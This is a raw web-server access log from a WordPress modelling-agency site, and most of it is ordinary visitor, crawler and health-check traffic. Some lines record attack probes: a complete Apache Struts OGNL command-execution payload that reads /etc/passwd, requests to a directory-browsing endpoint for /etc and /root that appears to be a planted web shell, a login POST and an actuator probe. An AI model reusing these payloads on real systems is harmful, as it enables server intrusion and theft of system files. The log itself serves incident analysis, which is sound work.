197.211.52.68 - - [26/Jan/2026:12:36:11 -0500] "GET /?dir=%2Fetc HTTP/1.1" 200 4465 "https://duckduckgo.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:13 -0500] "GET /wp-content/themes/matrix-model/assets/css/aos.css HTTP/1.1" 200 26053 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:16 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.carousel.min.css HTTP/1.1" 404 260 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:17 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.theme.default.min.css HTTP/1.1" 404 265 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:19 -0500] "GET /wp-content/themes/matrix-model/assets/css/custom.css HTTP/1.1" 200 5229 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:19 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-5.jpg HTTP/1.1" 200 35264 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:20 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-8.jpg HTTP/1.1" 200 31506 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:21 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-2.jpg HTTP/1.1" 200 44619 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:21 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-9.jpg HTTP/1.1" 200 39513 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:21 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-6.jpg HTTP/1.1" 200 39553 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:17 -0500] "GET /wp-content/themes/matrix-model/assets/css/animate.min.css HTTP/1.1" 200 52592 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:22 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-3.jpg HTTP/1.1" 200 36068 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:22 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-1.jpg HTTP/1.1" 200 39164 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:23 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-7.jpg HTTP/1.1" 200 35534 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:26 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-4.jpg HTTP/1.1" 200 28534 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:36:12 -0500] "GET /wp-content/themes/matrix-model/assets/css/bootstrap_v4.3.1_min.css HTTP/1.1" 200 155712 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
15.235.98.131 - - [26/Jan/2026:12:36:32 -0500] "GET /feed/?attachment_id=218 HTTP/1.1" 200 753 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
197.211.52.68 - - [26/Jan/2026:12:36:21 -0500] "GET /wp-content/uploads/2021/07/logo.png HTTP/1.1" 200 181002 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
188.166.35.151 - - [26/Jan/2026:12:36:38 -0500] "POST /wp-login.php HTTP/1.1" 200 7170 "-" "Mozilla/5.0"
197.211.52.68 - - [26/Jan/2026:12:36:42 -0500] "GET /wp-content/themes/matrix-model/assets/images/logo/favicon.png HTTP/1.1" 404 259 "https://matrixmodels.com/?dir=%2Fetc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:37:18 -0500] "GET /?dir=%2Froot HTTP/1.1" 200 4465 "https://duckduckgo.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:37:19 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.carousel.min.css HTTP/1.1" 404 260 "https://matrixmodels.com/?dir=%2Froot" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
197.211.52.68 - - [26/Jan/2026:12:37:20 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.theme.default.min.css HTTP/1.1" 404 265 "https://matrixmodels.com/?dir=%2Froot" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36"
64.59.72.148 - - [26/Jan/2026:12:37:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
79.124.40.174 - - [26/Jan/2026:12:38:02 -0500] "GET /actuator/gateway/routes HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [26/Jan/2026:12:38:03 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 8520 "https://74.206.165.146:443/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
158.220.122.128 - - [26/Jan/2026:12:38:03 -0500] "GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1" 404 8442 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/620.32 (KHTML, like Gecko) Version/17.1.10 Safari/620.32"
64.59.72.148 - - [26/Jan/2026:12:39:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
62.217.151.180 - - [26/Jan/2026:12:39:27 -0500] "GET /wp-content/uploads/2019/03/Alex-Grey_050.jpg HTTP/1.1" 200 121038 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1"
5.126.42.86 - - [26/Jan/2026:12:39:33 -0500] "GET /wp-content/uploads/2015/12/JILLIAN-5.jpg HTTP/1.1" 200 108032 "-" "com.google.android.apps.searchlite/1138491 (Linux; U; Android 15; fa_IR; 2410FPCC5G; Build/AP3A.240905.015.A2; Cronet/143.0.7445.0)"
64.59.72.148 - - [26/Jan/2026:12:41:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
54.39.203.75 - - [26/Jan/2026:12:42:19 -0500] "GET /?dir=%2Fhome%2Fhttpd%2Fhtml%2Fmatrixmodels.com%2Fpublic_html&mode=copy&src=.htaccess.cache.1488900185 HTTP/1.1" 200 4465 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
152.228.220.143 - - [26/Jan/2026:12:43:08 -0500] "GET /feed/ HTTP/1.1" 200 28447 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.66 Safari/537.36"
64.59.72.148 - - [26/Jan/2026:12:43:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /otw-portfolio/gabbie-carter/ HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET / HTTP/1.1" 200 4446 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/css/aos.css HTTP/1.1" 200 26053 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.carousel.min.css HTTP/1.1" 404 260 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/css/animate.min.css HTTP/1.1" 200 52592 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.theme.default.min.css HTTP/1.1" 404 265 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/css/custom.css HTTP/1.1" 200 5229 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/css/bootstrap_v4.3.1_min.css HTTP/1.1" 200 155712 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-1.jpg HTTP/1.1" 200 39164 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-2.jpg HTTP/1.1" 200 44619 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-3.jpg HTTP/1.1" 200 36068 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-5.jpg HTTP/1.1" 200 35264 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-6.jpg HTTP/1.1" 200 39553 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-9.jpg HTTP/1.1" 200 39513 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/uploads/2021/07/logo.png HTTP/1.1" 200 181002 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-7.jpg HTTP/1.1" 200 35534 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-8.jpg HTTP/1.1" 200 31506 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:44:56 -0500] "GET /wp-content/themes/matrix-model/assets/images/more/i-4.jpg HTTP/1.1" 200 28534 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /our-models HTTP/1.1" 301 - "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /our-models/ HTTP/1.1" 200 7587 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.6.16 HTTP/1.1" 200 14229 "http://matrixmodels.com/our-models/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.6.16 HTTP/1.1" 200 51338 "http://matrixmodels.com/our-models/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /wp-content/themes/matrix-model/style.css?ver=5.6.16 HTTP/1.1" 200 41969 "http://matrixmodels.com/our-models/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1" 200 11224 "http://matrixmodels.com/our-models/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.5.1 HTTP/1.1" 200 89496 "http://matrixmodels.com/our-models/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:05 -0500] "GET /wp-content/themes/matrix-model/images/inner-logo.jpg HTTP/1.1" 200 8330 "http://matrixmodels.com/our-models/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
66.249.70.134 - - [26/Jan/2026:12:45:06 -0500] "GET /?p=2789 HTTP/1.1" 404 8442 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.248.31.96 - - [26/Jan/2026:12:45:13 -0500] "GET / HTTP/1.1" 200 4446 "http://matrixmodels.com/our-models/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:13 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.carousel.min.css HTTP/1.1" 404 260 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:13 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.theme.default.min.css HTTP/1.1" 404 265 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
64.59.72.148 - - [26/Jan/2026:12:45:22 -0500] "GET / HTTP/1.1" 200 4446 "-" "check_http/v2.4.9 (nagios-plugins 2.4.9)"
167.248.31.96 - - [26/Jan/2026:12:45:24 -0500] "GET /our-models/ HTTP/1.1" 200 7587 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:39 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.carousel.min.css HTTP/1.1" 404 260 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
167.248.31.96 - - [26/Jan/2026:12:45:39 -0500] "GET /wp-content/themes/matrix-model/assets/css/owl.theme.default.min.css HTTP/1.1" 404 265 "http://matrixmodels.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 26_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/23C55 [FBAN/FBIOS;FBAV/537.0.0.32.82;FBBV/813851951;FBDV/iPhone17,2;FBMD/iPhone;FBSN/iOS;FBSV/26.2;FBSS/3;FBID/phone;FBLC/en_US;FBOP/5;FBRV/821170649;IABMV/1]"
